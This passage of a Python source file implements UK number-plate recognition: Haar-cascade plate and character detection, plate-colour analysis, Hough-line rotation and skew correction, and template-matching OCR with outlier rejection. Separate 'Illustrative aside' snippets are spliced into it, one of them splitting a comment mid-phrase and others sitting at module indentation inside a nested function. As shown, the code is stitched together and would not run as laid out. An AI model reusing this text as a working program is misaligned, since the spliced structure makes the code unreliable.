pltCas.detectMultiScale(img, 1.1+(z/300), z+6, 0, Tmin, Tmax)\r\n c = len(pls)\r\n if c == 1: return pls[0] # one plate, job done.\r\n if c == 0:\r\n if z == 0: return pls0 # no plate\r\n ul = z\r\n z = (ll + z)//2\r\n if z == ll: break # out of options\r\n else:\r\n pls0 = pls[0] # keep this option up our sleeve\r\n ll = z\r\n z = (z + ul)//2\r\n if z == ll: break # out of options\r\n # >1 result, carry on slowly increasing Z without limit until 1 or no results\r\n while True:\r\n z = max(z+1, z*1.05)\r\n pls = pltCas.detectMultiScale(img, 1.1+(z/150), int(z), 0, Tmin, Tmax)\r\n c = len(pls)\r\n if c == 1: return pls[0]\r\n if c == 0: break\r\n return pls0\r\n\r\n# Analyse the average colour within the optionally specified crop window for whiteness or yellowness\r\n# Crop process is tolerant of -ve X / Y and also X > W / Y > H\r\n# Assumes img is a 3-plane BGR colour image\r\n# Warning: contrast stretching may distort plate colour, don't use it prior to calling this.\r\ndef WhtOrYel(in_img, crop = (0,0,0,0)):\r\n # crop?\r\n if (crop[2] > 0) and (crop[3] > 0):\r\n H = len(in_img)\r\n W = len(in_img[0])\r\n (Y0,Y1,X0,X1) = (crop[1], crop[1] + crop[3], crop[0], crop[0] + crop[2])\r\n Y0 = min(max(Y0, 0), H-1)\r\n Y1 = min(max(Y1, 0), H-1)\r\n X0 = min(max(X0, 0), W-1)\r\n X1 = min(max(X1, 0), W-1)\r\n img = in_img[Y0:Y1, X0:X1] # crop\r\n H = len(img)\r\n W = len(img[0])\r\n bgr_planes = cv2.split(img)\r\n if len(bgr_planes) < 3: return '-' # bad crop/image\r\n b = r = 0\r\n Ag = np.median(bgr_planes[1])\r\n for y in range(0, H):\r\n for x in range(0, W):\r\n if bgr_planes[1][y][x] >= Ag:\r\n b += bgr_planes[0][y][x]\r\n r += bgr_planes[2][y][x]\r\n if (r == b): return '-' # monochrome image\r\n # colour test\r\n if r == 0: return '-'	# blank image?\r\n x = b / r\r\n # print('{:0.2f}'.format(x), end = '')\r\n if x < 0.9: return 'Y'\r\n if x > 0.9: return 'W'\r\n return '-' # in dead-band\r\n\r\n# Master plate-read algorithm ------------------\r\n#\r\n# If you have already run the lookForPlate() function on the image and have an (XYWH) tuple\r\n# you can supply this to ReadPlate() to skip the initial classifier stage and save some CPU time.\r\n#\r\n# convert 
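# --- Illustrative aside ------------------------------------------------------
# Typical use of the two public helpers above on a BGR frame, assuming a
# camera whose mid-field plates are roughly 170x50 px ("frame.jpg" is a
# hypothetical input file):
import cv2

frame = cv2.imread("frame.jpg")
gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
x, y, w, h = lookForPlate(gray, (170, 50))
if w:                                        # (0,0,0,0) means no plate found
    colour = WhtOrYel(frame, (x, y, w, h))   # 'W', 'Y' or '-'
# ------------------------------------------------------------------------------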
source image to grey-scale if necessary\r\n# identify approx plate position using haar-cascades\r\n# return error if no plate\r\n# crop to plate AOI\r\n# detect and compensate for white-on-black style plates\r\n# horizontalise the crop\r\n# de-skew characters\r\n# estimate character size\r\n# OCR (template-match) all non-I characters, with itterative char-size optimisation\r\n# OCR for I characters\r\n# reject mis-aligned or badly positioned characters \r\n# derive an arbitrary confidence level\r\n# determine plate b/g colour\r\n#\r\n# Return ('reg', confidence%, (plate-location), 'plate_colour') or '!error_msg'\r\n# as: ( string, 0..99, (X,Y,W,H), ['W'|'Y'|'B'|'-'] )\r\n# or: string\r\n#\r\ndef ReadPlate(in_img, TargetWH=(170,50), plateXYWH=None):\r\n\r\n # -------------------------- local misc support functions -----------------------\r\n\r\n # Enlarge W & H of a crop geometry w/ approp adj of X & Y, width*2 & height*1.66\r\n def enlargeCrop(xywh):\r\n W = int(xywh[2] * 2)\r\n H = int(xywh[3] * 1.66)\r\n X = xywh[0] - (W - xywh[2])//2\r\n Y = xywh[1] - (H - xywh[3])//2\r\n if X < 0: X = 0\r\n if Y < 0: Y = 0\r\n return (X,Y,W,H)\r\n\r\n # Crop an image to the specified XYWH rectangle\r\n # NOTE if X0,Y0 or X1,Y1 exceed the image boundry then a smaller than expected image will be returned.\r\n # ASSUMES img is monochrome\r\n def cropIt(img, crop):\r\n ih, iw = img.shape\r\n X0,Y0,X1,Y1 = crop[0], crop[1], crop[0] + crop[2], crop[1] + crop[3]\r\n return img[Y0:Y1, X0:X1]\r\n\r\n # measure the 'morf' image's central block height\r\n # return the height and a centre-line estimate\r\n def measureTxH(img, xl, xr):\r\n xpcs = ()\r\n for i in range(0,10):\r\n xpcs += (int(xl + ((xr - xl) * (i + 0.5) / 10)) ,)\r\n ih = len(img)\r\n iw = len(img[0])\r\n yc = n = 0\r\n Hs = ()\r\n for xs in xpcs:\r\n if (xs < 0) or (xs >= iw): continue\r\n # search up from center-line...\r\n yt = yb = int(ih/2)\r\n while yt > 0:\r\n if img[yt][xs] == 0: break\r\n yt -= 1\r\n # search down...\r\n while yb < ih:\r\n if img[yb][xs] == 0: break\r\n yb += 1\r\n h = yb - yt\r\n if h > 2:\r\n Hs += (h, )\r\n yc += yb + yt\r\n n += 1\r\n avH = sjmAvg(Hs)\r\n if n > 0: ycl = yc / (2 * n)\r\n else: ycl = ih/3\r\n return int(avH-0.5), int(ycl)\r\n\r\n # Generate a simple linear equalising LUT from the supplied histogram\r\n # With hard coded 5% clip limits\r\n def heq(hist):\r\n LUT = np.zeros(256)\r\n bp = 0\r\n tp = 255\r\n t = 0\r\n th = np.sum(hist) * 0.05\r\n if th >= 1:\r\n #find bottom 5 percentile point bp\r\n while True:\r\n t += hist[bp]\r\n if t > th: break\r\n bp += 1\r\n #find top 5 percentile point\r\n t = 0\r\n while True:\r\n t += hist[tp]\r\n if t > th: break\r\n tp -= 1\r\n # build lut\r\n r = 255 / (tp - bp)\r\n for i in range(bp,256): LUT[i] = min(255, int(r * (i - bp)))\r\n return LUT\r\n\r\n # Calculate a modified average for a list of austensibly +ve numbers by rejecting -ves & any outliers \r\n # Delete no more than n/3 outliers, while aiming for a std of < 3\r\n def sjmAvg(in_lst):\r\n n = len(in_lst)\r\n if n == 0: return 0\r\n lst = in_lst\r\n s = np.std(lst)\r\n a = np.average(lst)\r\n if (s < 3) and (min(lst) >= 0): return a\r\n while (len(lst) > n * .66) and (len(lst) > 3) and (s > 3):\r\n newlst = ()\r\n for i in range(0, len(lst)):\r\n if (lst[i] >= 0) and (abs(lst[i] - a) < s): newlst += (lst[i],)\r\n lst = newlst\r\n if len(lst) > 0:\r\n s = np.std(lst)\r\n a = np.average(lst)\r\n return a\r\n\r\n # Calculate a modified average for a list of numbers by rejecting outliers \r\n # Delete no more 
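# --- Illustrative aside ------------------------------------------------------
# Effect of the outlier-trimming sjmAvg() above versus a plain mean, on a
# sample containing one wild value:
import numpy as np

vals = (19, 20, 21, 20, 95)
plain = np.average(vals)  # ~35.0, dragged up by the 95
# sjmAvg(vals) repeatedly drops values more than one std from the mean until
# the std falls below 3, so the 95 is rejected and the result is 20.0.
# ------------------------------------------------------------------------------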
than n/3 outliers, while aiming for a std of < minSD\r\n def sjmAvg2(in_lst, minSD):\r\n n = len(in_lst)\r\n if n == 0: return 0\r\n lst = in_lst\r\n s = np.std(lst)\r\n a = np.average(lst)\r\n while (len(lst) > n * .66) and (len(lst) > 3) and (s > minSD):\r\n newlst = ()\r\n for i in range(0, len(lst)):\r\n if abs(lst[i] - a) < s: newlst += (lst[i],)\r\n lst = newlst\r\n s = np.std(lst)\r\n a = np.average(lst) \r\n return a\r\n\r\n # If the majority of entries agree, dis-regard all others\r\n # otherwise just take the average\r\n def votedAverage(lst):\r\n av = np.average(lst)\r\n if len(lst) < 3: return av \r\n Bins,Bounds = np.histogram(lst, 20, [-10, 10])\r\n for i in range(0, len(Bins)):\r\n if Bins[i] > len(lst) / 2: return Bounds[i]\r\n return av\r\n\r\n # Nonify outliers from a list (NOT TUPLE) of numbers, by replacing bad numbers with None\r\n # Edit the supplied list in-place, keep removing out-liers until the Coefficient of Variance\r\n # of the remaining set falls below the specified maxCV\r\n # Return number-of-remainers, average, median and CV of remaining set\r\n # Used by the cascade character spotter\r\n def rejectOutliers(in_lst, maxCV):\r\n a = worst = -1\r\n s = 1\r\n while True:\r\n lst = ()\r\n for i in in_lst:\r\n if i is not None: lst += (i,)\r\n s = max(1, np.std(lst))\r\n a = np.average(lst)\r\n m = np.median(lst)\r\n cv = s / max(1, abs(a))\r\n if cv < maxCV: break\r\n if len(lst) < 3: break\r\n #print(a,m,s,cv)\r\n worst = worstn = None\r\n for i in range(0, len(in_lst)):\r\n if in_lst[i] is not None:\r\n dev = abs(in_lst[i] - a)\r\n if (worst is None) or (dev > worst):\r\n worst = dev\r\n worstn = i\r\n in_lst[worstn] = None\r\n return (len(lst), a, m, cv) \r\n\r\n # Look for UKFont character shapes using SJM's best Haar-cascade classifier\r\n # Don't return > 7 char locations\r\n # Reject any dodgey looking shapes with no real contrast\r\n def seekChrs(img, TxWH):\r\n Cas = CHCAS\r\n z = 1\r\n Tmin = (int(TxWH[0] * 0.5), int(TxWH[1] * 0.5))\r\n Tmax = (Tmin[0] * 3, Tmin[1] * 3)\r\n while True:\r\n z = int(z * 1.2 + 1)\r\n chs = Cas.detectMultiScale(img, 1.01 + (z/200) , z, 0, Tmin, Tmax)\r\n if len(chs) < 8: break\r\n if len(chs) == 0: return [],-1\r\n # from the chs tuple build a list or rects and a list of areas\r\n # in prep for rejecting area and centre-line out-liers\r\n cList = list(range(0,len(chs)))\r\n chsA = cList.copy()\r\n for n in range(0, len(chs)):\r\n ch = chs[n]\r\n cList[n] = ch\r\n chsA[n] = ch[2] * ch[3]\r\n # Reject area out-liers\r\n N,Aav,Amd,Acv = rejectOutliers(chsA, 0.1) # until Coef of Variance < 0.1\r\n # reject phantom spots with little or no contrast in the original img\r\n for n in range(0, len(chsA)):\r\n if chsA[n] is not None:\r\n (x,y,w,h) = (cList[n][0],cList[n][1],cList[n][2],cList[n][3])\r\n chsA[n] = np.std(img[y:y+h, x:x+w]) # we use std dev as a proxy for contrast\r\n N,av,md,cv = rejectOutliers(chsA, 0.2)\r\n # Reject Yc out-liers\r\n for n in range(0, len(chsA)):\r\n if chsA[n] is not None: chsA[n] = cList[n][1] + (cList[n][3] / 2) # centre y co-ord\r\n N,Yav,Ymd,Ycv = rejectOutliers(chsA, 0.1)\r\n # edit cList to reflect current state of chsA 'None's\r\n for i in range(len(chsA)-1 , -1, -1):\r\n if chsA[i] is None: cList = np.delete(cList, i, axis=0)\r\n return cList, Yav\r\n\r\n # Given a map of values find the local peaks over the specified sampling window\r\n # return a list of (X,Y,val) tuples\r\n def findLocalPeaks(map, gw):\r\n result = []\r\n gx = gw - (1 - (gw % 2)) # force grid width to an odd no.\r\n gbx2 = 
int(gx/2)\r\n H = len(map)\r\n W = len(map[0])\r\n Xxcs = np.zeros(W)\r\n Xys = np.zeros(W)\r\n Xnzav = np.zeros(W)\r\n for x in range(0, W):\r\n n = 0\r\n for y in range(0, H):\r\n if map[y,x] > 0:\r\n Xnzav[x] += map[y,x]\r\n n += 1\r\n if map[y,x] > Xxcs[x]:\r\n Xxcs[x] = map[y,x]\r\n Xys[x] = y\r\n if n > 0: Xnzav[x] = (Xnzav[x] - Xxcs[x]) / max(1, n)\r\n if Xxcs[x] < Xnzav[x] * 1.14: Xxcs[x] = 0\r\n for x in range(gbx2, W-gbx2):\r\n tst = Xxcs[x-gbx2:x+gbx2+1].copy()\r\n mx = np.max(tst)\r\n if mx < 0.25: continue\r\n if tst[gbx2] != mx: continue\r\n # AND UNIQUE PK, all other points must be < mx\r\n tst[gbx2] = 0\r\n if mx == np.max(tst): continue\r\n # and must be sig > average of all other nz points in the central column\r\n if mx < 1.14 * np.sum(tst) / (1 + cv2.countNonZero(tst)): continue\r\n result.append((x, int(Xys[x]), mx))\r\n return result\r\n\r\n # If lh & rh end chars are > maxX apart then cull the weaker one\r\n # del item(s) in regData accordingly\r\n # Return true if any deletions made, to allow for itteration\r\n def delOOBChars(regData, pw, avW, wdthI):\r\n Xlist = sorted(regData)\r\n lhi = 0\r\n rhi = len(regData) - 1\r\n if rhi <= lhi: return False\r\n xl,xr = Xlist[lhi], Xlist[rhi]\r\n wl = avW/2\r\n if regData[xl][0] == 'I': wl = wdthI/2\r\n wr = avW/2\r\n if regData[xr][0] == 'I': wr = wdthI/2\r\n if (xr-wr) - (xl+wl) <= pw: return False\r\n if regData[xr][2] > regData[xl][2]:\r\n #print('ODel', xl, regData[xl])\r\n del(regData[xl])\r\n return True\r\n if regData[xr][2] < regData[xl][2]:\r\n #print('ODel', xr, regData[xr])\r\n del(regData[xr])\r\n return True\r\n del(regData[xl])\r\n del(regData[xr])\r\n return True\r\n\r\n # If the weakest XC in the list is < thr * average of the rest delete it.\r\n # Return true if any regData item has been removed, to allow for itteration\r\n # We first build a weakness score based on: low xc, poor Y alignment and\r\n # excessive inter-char gaps at the ends of the string\r\n def rejectWeaklings(regData, thr):\r\n if len(regData) < 3: return False\r\n Xlist = sorted(regData)\r\n gaplst = ()\r\n XClist = []\r\n prevX = None\r\n for x in Xlist:\r\n XClist += [regData[x][2]]\r\n if prevX is not None: gaplst += (x-prevX, )\r\n prevX = x\r\n avgap = sjmAvg(gaplst)\r\n rating = ()\r\n for i in range(0, len(Xlist)):\r\n x = Xlist[i]\r\n if len(regData[x]) > 3:\r\n ch,y,xc,dy = regData[x]\r\n else:\r\n ch,y,xc = regData[x]\r\n dy = 0\r\n g = 0\r\n if (i == 0):\r\n g = Xlist[1] - x\r\n if (i == len(Xlist) - 1):\r\n g = x - Xlist[-2]\r\n # if the leading / trailing char is I be more draconian...\r\n if (g > 0) and (ch == 'I'): g /= math.pow(xc, 2.5)\r\n if g > avgap:\r\n g -= avgap\r\n g *= 4 / avgap\r\n else: g = 0\r\n # calculate average XC but WITHOUT this current entry\r\n XClistNaN = XClist.copy()\r\n XClistNaN[i] = np.NaN\r\n axc = np.nanmean(XClistNaN)\r\n dxc = max(0, axc*axc - xc*xc) * 18\r\n q = 2*dy + dxc + g\r\n rating += (q, )\r\n wq = max(rating)\r\n if wq > thr:\r\n for i in range(0, len(Xlist)):\r\n if wq == rating[i]:\r\n del(regData[Xlist[i]])\r\n return True\r\n return False\r\n\r\n def gap2BestFit(xref, regData):\r\n Xlist = sorted(regData)\r\n # Pre-load the Xlist with duplicate entries - more duplicates for higher xcs\r\n del(Xlist[Xlist.index(xref)]) # but remove the specified entry\r\n x = Xlist.copy()\r\n for i in Xlist:\r\n xc = regData[i][2]\r\n nd = int(math.pow(2, max(0, (xc * xc * 12) - 3))) # 0.9 => +32 dups ... 
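# --- Illustrative aside ------------------------------------------------------
# The best-fit line computed in gap2BestFit() (continued below) is ordinary
# least squares written out longhand; on points lying exactly on y = 2x + 1
# it recovers slope 2 and offset 1:
x = [0, 1, 2, 3]
y = [1, 3, 5, 7]
x_mean, y_mean = sum(x) / len(x), sum(y) / len(y)
covar = sum((xi - x_mean) * (yi - y_mean) for xi, yi in zip(x, y))
b1 = covar / sum((xi - x_mean) ** 2 for xi in x)  # slope  -> 2.0
b0 = y_mean - b1 * x_mean                         # offset -> 1.0
# ------------------------------------------------------------------------------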
0.65 => +2 dup\r\n if nd > 1:\r\n for n in range(1,nd): x.append(i)\r\n # Linear regression analysis on the augmented list\r\n y = [regData[i][1] for i in x]\r\n x_mean, y_mean = np.mean(x), np.mean(y)\r\n covar = 0.0\r\n for i in range(len(x)): covar += (x[i] - x_mean) * (y[i] - y_mean)\r\n b1 = covar / max(1, sum([(p - x_mean)**2 for p in x]))\r\n b0 = y_mean - b1 * x_mean\r\n dy = abs(regData[xref][1] - (b1 * xref + b0))\r\n return dy\r\n\r\n # Force a set of XY points to fit a straight line to within the specified coef-of-variance\r\n # Progressively delete poorest entries in regData until variance acheived\r\n # Augment each regData entry with it's dy error distance (in pixels) in index[3]\r\n # Return an estimated y centre-line and the max deviation from it\r\n def forceFit(regData, vmax):\r\n v = vmax+1\r\n while v > vmax:\r\n Xlist = sorted(regData)\r\n XYset = [[x, regData[x][1]] for x in Xlist] # list of X,Y pairs for later\r\n # now reject the points that fit most poorly to the best straight line through the OTHER points\r\n worst = 0\r\n wi = 0\r\n i = 0\r\n rslt = []\r\n for x,y in XYset:\r\n dy = gap2BestFit(x, regData) # y gap to the best-fit line WITHOUT the current x point\r\n if dy > worst:\r\n worst = dy\r\n wi = len(rslt)\r\n rslt.append(dy)\r\n if len(regData[x]) < 4: regData[x].append(dy)\r\n else: regData[x][3] = dy\r\n v = np.var(rslt)\r\n if v > vmax:\r\n #print('FDel', Xlist[wi], regData[Xlist[wi]])\r\n del(regData[Xlist[wi]])\r\n # re-calc mean\r\n y_mean = 0\r\n for x in regData: y_mean += regData[x][1]\r\n y_mean /= len(regData)\r\n # want to return the max deviation from the int(y_mean)\r\n ycl = int(y_mean + 0.5)\r\n dy = ()\r\n for x in regData: dy += (abs(ycl - regData[x][1]), )\r\n return max(dy), ycl\r\n\r\n # Return index (x value) of nearest chars both left and right of target\r\n def nearestValids(x, regData):\r\n if x in regData: return (x,x)\r\n xs = sorted(regData) # smallest first\r\n if len(xs) == 0: return(None, None)\r\n if x < xs[0]: return (None, xs[0])\r\n if x > xs[-1]: return (xs[-1], None)\r\n for i in range(1, len(xs)):\r\n if (x < xs[i]) : break\r\n return (xs[i-1], xs[i])\r\n\r\n # Trim away blank (white) borders from an image\r\n # assumes at least one black pixel exists in image\r\n # and that the image has non-black borders on all 4 edges\r\n def trimImage(im):\r\n Hmins = np.amin(im, axis = 0) # list of min values in each V column\r\n # we can discard any left/right hand image colums that are nz in Hmins\r\n lhs = 0\r\n while Hmins[lhs] > 127: lhs += 1\r\n rhs = lhs\r\n while Hmins[rhs] < 128: rhs += 1\r\n Vmins = np.amin(im, axis = 1)\r\n # we can discard any top/bottom image rows that are nz in Vmins\r\n top = 0\r\n while Vmins[top] > 127: top += 1\r\n bot = top\r\n while Vmins[bot] < 128: bot += 1\r\n return im[top:bot, lhs:rhs]\r\n\r\n # Return a char template image to the specified char height & width to include extra\r\n # one or two pixel H & V borders so as to force an odd H & V pixel size as required by template matcher\r\n def makeCharTmplt(c, th, tw):\r\n im = cv2.resize(np.array(OCRFonts.UKFont[c], dtype=np.uint8), (tw, th), interpolation=cv2.INTER_CUBIC)\r\n # Add borders post-scale and force an odd-number of pixels in both H & V\r\n iw = tw + 6 - (1 - (tw % 2))\r\n ih = th + 6 - (1 - (th % 2))\r\n tmplt = np.ones((ih,iw), dtype=np.uint8)\r\n tmplt *= 255\r\n tmplt[2:th+2, 2:tw+2] = im\r\n return tmplt\r\n\r\n # Template-matches (XC) the img with character-templates from chlst made to the specified size (th,tw)\r\n # 
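# --- Illustrative aside ------------------------------------------------------
# makeCharTmplt() above pads each glyph and forces odd H & V pixel counts
# (as its comment notes, the template matcher wants odd sizes). The border
# arithmetic on even and odd inputs:
tw = 20
iw = tw + 6 - (1 - (tw % 2))  # even 20 -> 25 (odd)
tw = 21
iw = tw + 6 - (1 - (tw % 2))  # odd 21 -> 27 (still odd)
# ------------------------------------------------------------------------------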
returns the average of the top n peaks found in the resulting xcmap\r\n # along with a dictionary of XC peak values indexed by character (from chlst)\r\n def preScan(img, AOI, chlst, th, tw, n, pw, chwI):\r\n xcmap = np.zeros(img.shape)\r\n chmap = np.zeros(img.shape, dtype=str)\r\n charMaxXC = {}\r\n x0,y0,x1,y1 = AOI\r\n subimg = img[y0:y1, x0:x1]\r\n if len(subimg) < 10: return 0,0,0,0,{},(),{}\r\n for c in chlst:\r\n tmplt = makeCharTmplt(c, th, tw) # tmplt will have guaranteed odd-numbered H & W pixel counts\r\n # make sure template is smaller (less high in y) than AOI\r\n while len(tmplt) >= len(subimg): tmplt = tmplt[1:-1]\r\n xo = x0 + len(tmplt[0]) // 2\r\n yo = y0 + len(tmplt) // 2\r\n xco = cv2.matchTemplate(subimg, tmplt, cv2.TM_CCOEFF_NORMED)\r\n charMaxXC[c] = np.amax(xco)\r\n #if DEBUG and (c == '3'):\r\n # print(charMaxXC[c])\r\n # cv2.imshow('xc_debug', xco)\r\n # cv2.imshow('tmp_debug', tmplt)\r\n if charMaxXC[c] > 0.33:\r\n for x in range(0, len(xco[0])):\r\n for y in range(0, len(xco)):\r\n if xcmap[y+yo,x+xo] < xco[y,x]:\r\n xcmap[y+yo,x+xo] = xco[y,x]\r\n chmap[y+yo,x+xo] = c\r\n # find the peaks\r\n ppoints = findLocalPeaks(xcmap, tw * 1.1)\r\n if len(ppoints) == 0: return 0,0,0,0,{},(),{}\r\n # calc average xc of the top n peaks (n as specified)\r\n xcc = ()\r\n for x,y,xc in ppoints: xcc += (xc, )\r\n if len(xcc) > n:\r\n bxc = np.average(sorted(xcc, reverse = True)[0:n])\r\n else:\r\n bxc = np.average(xcc)\r\n # from ppoints make regdata\r\n regData = {}\r\n prevX = None\r\n for x,y,xc in ppoints:\r\n ch = chmap[y,x]\r\n if prevX is not None:\r\n # check for overlapping chars\r\n if x - prevX < tw + 1:\r\n # a conflict, pick only the strongest\r\n if xc < regData[prevX][2]: continue\r\n del(regData[prevX])\r\n regData[x] = [ch, y , xc]\r\n prevX = x\r\n # Reject any edge chars that are > max possible inter-char-gap pixels apart\r\n while delOOBChars(regData, pw, tw, chwI): pass\r\n # Reject the worst Y co-ordinate out-liers\r\n dy,yc = forceFit(regData, 0.66)\r\n return bxc, dy, yc, len(tmplt), charMaxXC, ppoints, regData\r\n\r\n # Run a simplified XC scan for I characters\r\n # we only scan along the yc centre-line\r\n def IScan(img, yc, tw, th):\r\n xcmap = np.zeros(img.shape)\r\n charMaxXC = {}\r\n tmplt = makeCharTmplt('I', th, tw) # tmplt will have guaranteed odd-numbered H & W pixel counts\r\n xo = len(tmplt[0]) // 2\r\n tmh = len(tmplt) // 2\r\n # make sure template is smaller (less high in y) than AOI\r\n im = img[(yc-1-tmh):(yc+2+tmh), 0:-1]\r\n if len(im) < 10: return ()\r\n while len(tmplt) >= len(im): tmplt = tmplt[1:-1]\r\n xco = cv2.matchTemplate(im, tmplt, cv2.TM_CCOEFF_NORMED)\r\n for x in range(0, len(xco[0])): xcmap[yc,x+xo] = max(xco[:,x])\r\n # find the peaks\r\n ppoints = findLocalPeaks(xcmap, tw * 1.1)\r\n if len(ppoints) == 0: return ()\r\n return ppoints\r\n\r\n # next integer in sequence 0,+1,+2,+3.. 
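# --- Illustrative aside ------------------------------------------------------
# preScan() above scores glyph templates against the plate crop with
# normalised cross-correlation; a synthetic single-template example:
import cv2
import numpy as np

img = np.full((40, 120), 255, np.uint8)
img[12:33, 52:64] = 0                      # dark 21x12 block to find
tmplt = np.full((25, 16), 255, np.uint8)   # white-bordered template
tmplt[2:23, 2:14] = 0                      # matching dark interior
xco = cv2.matchTemplate(img, tmplt, cv2.TM_CCOEFF_NORMED)
_, best, _, loc = cv2.minMaxLoc(xco)       # best ~ 1.0 at loc == (50, 10)
# ------------------------------------------------------------------------------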
or -1,-2,-3..\r\n def nextUD(d):\r\n if d < 0: d -= 1\r\n else: d += 1\r\n return d\r\n\r\n # Rule-of-thumb conversion from a pre-scan bxc to a limit on character list length\r\n # roughly xcs < .8 do not limit character list thro to xc = 1: limit of top 8 chars\r\n def XC2N(xc):\r\n if xc < 0.8: return None\r\n return 8 + int((125 * (1 - xc)))\r\n\r\n # Derive a new (hopefully reduced) AOI from the latest set of ppoints XC peaks\r\n def AOIfromPks(iw, ih, tw, ppks, bxc, tph, dy, yc):\r\n xmin = None\r\n xmax = None\r\n for x,y,xc in ppks:\r\n if xc > 0.6 * bxc:\r\n if xmin is None: xmin = x # the first sig pk\r\n xmax = x # the last sig pk\r\n if xmin is None: xmin = 0\r\n if xmax is None: xmax = iw\r\n AOI[0] = max(0, xmin - tw)\r\n AOI[2] = min(iw-1, xmax + tw)\r\n AOI[1] = max(0, int(yc - 2*dy - (tph//2) + 2))\r\n AOI[3] = min(ih-1, int(yc + 2*dy + (tph//2) + 2))\r\n return AOI\r\n\r\n # Merge a post-optimisation rd with a master regData\r\n # Not for use with I chars\r\n def regMerge(regData, rd, tw):\r\n #rprint(regData)\r\n #rprint(rd)\r\n # Augment regData with rd data, resolving any conflicts by rejecting the weaker char\r\n for x in rd:\r\n if x in regData:\r\n if rd[x][2] > regData[x][2]: regData[x] = rd[x]\r\n continue\r\n (xxl,xxr) = nearestValids(x, regData)\r\n xxcl = xxcr = 0\r\n if xxl is not None:\r\n if x - xxl <= tw + 1: xxcl = regData[xxl][2]\r\n if xxr is not None:\r\n if xxr - x <= tw + 1: xxcr = regData[xxr][2]\r\n xxc = max(xxcl, xxcr)\r\n if rd[x][2] < xxc: continue\r\n if xxc > 0:\r\n if (xxcr > 0) and (xxcl > 0):\r\n del(regData[xxl])\r\n del(regData[xxr])\r\n else:\r\n if xxcl > xxcr: xx = xxl\r\n else: xx = xxr\r\n del(regData[xx])\r\n regData[x] = rd[x]\r\n return regData\r\n\r\n # Detect plate rotation angle from alignment of cas char detections\r\n def rotFromCas(XYWHs):\r\n if len(XYWHs) < 2: return 0,0\r\n x = []\r\n y = []\r\n # Linear regression analysis on the list\r\n for X,Y,W,H in XYWHs:\r\n x.append(X + W/2)\r\n y.append(Y + H/2)\r\n x_mean, y_mean = np.mean(x), np.mean(y)\r\n x_span = max(x) - min(x)\r\n covar = 0.0\r\n for i in range(len(x)): covar += (x[i] - x_mean) * (y[i] - y_mean)\r\n b1 = covar / max(1, sum([(p - x_mean)**2 for p in x]))\r\n # b1 is slope, 0 = horiz, +ve = ?\r\n return math.atan(b1) * 180.0 / math.pi, x_span\r\n\r\n # Detect rotational angle of plate in image using hough lines\r\n def rotFromLines(img):\r\n # Find the longest (best) first few near-horizontal lines\r\n # scan down rapidly through length scale until we get > 3 results\r\n # then scan back up incrementally to find the first 3 H-lines\r\n PIBY180 = np.pi / 180\r\n ih,iw = img.shape\r\n llen = iw\r\n deglst = ()\r\n while (len(deglst) < 3) and (llen > 10):\r\n llen = int(llen * 0.9)\r\n lines = cv2.HoughLines(img, 1, PIBY180, llen)\r\n if lines is None: continue\r\n else:\r\n deglst = ()\r\n for line in lines:\r\n d, theta = line[0]\r\n degs = int(0.5 + (theta / PIBY180)) - 90\r\n dc = d + (iw * math.sin(degs * PIBY180) / 2)\r\n if (degs > -10) and (degs < 10) and (dc > ih * 0.1) and (dc < ih * 0.9): # look only at mid, near horizontals\r\n deglst += (degs,)\r\n keep = deglst\r\n while len(deglst) > 3:\r\n llen += 1\r\n lines = cv2.HoughLines(img, 1, PIBY180, llen)\r\n if lines is None:\r\n deglst = keep \r\n break\r\n else:\r\n keep = deglst\r\n deglst = ()\r\n for line in lines:\r\n d, theta = line[0]\r\n degs = int(0.5 + (theta / PIBY180)) - 90\r\n dc = d + (iw * math.sin(degs * PIBY180) / 2)\r\n if (degs > -10) and (degs < 10) and (dc > ih * 0.1) and (dc < ih 
* 0.9): # look only at mid, near horizontals\r\n deglst += (degs,) \r\n if len(deglst) == 0: return 0,0\r\n degs = votedAverage(deglst) # -ve result means anticlockwise rotation\r\n v = np.var(deglst)\r\n cnf = max(0, (1 - v)*0.66) # never that good!\r\n return degs, cnf\r\n\r\n # Detect the text skew angle using hough lines \r\n def skewAngle(img, th):\r\n PIBY180 = np.pi / 180\r\n ih,iw = img.shape\r\n llen = th\r\n deglst = ()\r\n while len(deglst) < 32:\r\n deglst = ()\r\n llen = int(llen * 0.95) - 1\r\n lines = cv2.HoughLines(img, 1, PIBY180, llen)\r\n if lines is None: continue\r\n else:\r\n for line in lines:\r\n d, theta = line[0]\r\n degs = int(0.5 + theta / PIBY180)\r\n if degs > 90: degs -= 180 # convert to a continuum\r\n if abs(degs) < 9: # pick only the near-verticals\r\n dc = abs(d) + (ih/2) * math.sin(degs * PIBY180)\r\n if (dc < iw * 0.1) or (dc > iw * 0.9): continue # reject anything at edges\r\n deglst += (degs, )\r\n if len(deglst) < 6: return 0, 0\r\n return np.median(deglst), 1 # works better than: sjmAvg2(deglst, 2), 1\r\n\r\n # Return the likelyhood value (from PlateLUT) of the supplied reg\r\n # pick best 0/1, O/I interpretation\r\n # Return -ve if there's no match to any format template\r\n def likelyhoodScore(reg):\r\n creg = characterise(reg, 1)\r\n keys = PlateLUT.keys()\r\n score = -20\r\n for fmt in keys:\r\n if dotMatch(creg, fmt): score = max(score, PlateLUT[fmt])\r\n return score\r\n\r\n # Assuming a -ve likelyhood score for the given reg, can we find a single mis-read\r\n # character that is causing a mis-match to a valid format template?\r\n # If so then, further, if that char is commonly mis-read we simply swap it for it's doppleganger.\r\n # Otherwise return ''\r\n def swapBadCh(reg):\r\n creg = characterise(reg, 1)\r\n keys = list(PlateLUT.keys())\r\n for k in range(len(keys)-1, -1, -1):\r\n fmt = keys[k]\r\n if len(fmt) == len(creg):\r\n badCnt = 0\r\n for i in range(0, len(fmt)):\r\n if creg[i] == '.': continue\r\n if creg[i] != fmt[i]:\r\n badCnt += 1\r\n badi = i\r\n if badCnt == 0: return reg\r\n if badCnt == 1:\r\n # dict of commonly mis-read alpha/num pairs\r\n # note that most are reversible but O/0 equivalence means D & Q have a one-way association with 0 \r\n SwapTab = {'8':'B', 'B':'8', 'Z':'7', '7':'Z', '6':'G', 'G':'6', '5':'S', 'S':'5', 'D':'0', 'Q':'0'}\r\n c = reg[badi]\r\n if c in SwapTab: return reg[:badi] + SwapTab[c] + reg[badi+1:]\r\n return ''\r\n\r\n # convert reg into @#.? format where # maps to any number, @ maps to any u/c alpha,\r\n # dot maps to 0,1,O or I and ? mops up anything invalid that shouldn't be there.\r\n # If argument dots = 0 then 01IO->dot mapping is not done\r\n def characterise(reg, dots=1):\r\n creg = ''\r\n for i in range(0, len(reg)):\r\n ch = reg[i]\r\n if (ch in 'IO01') and (dots != 0): 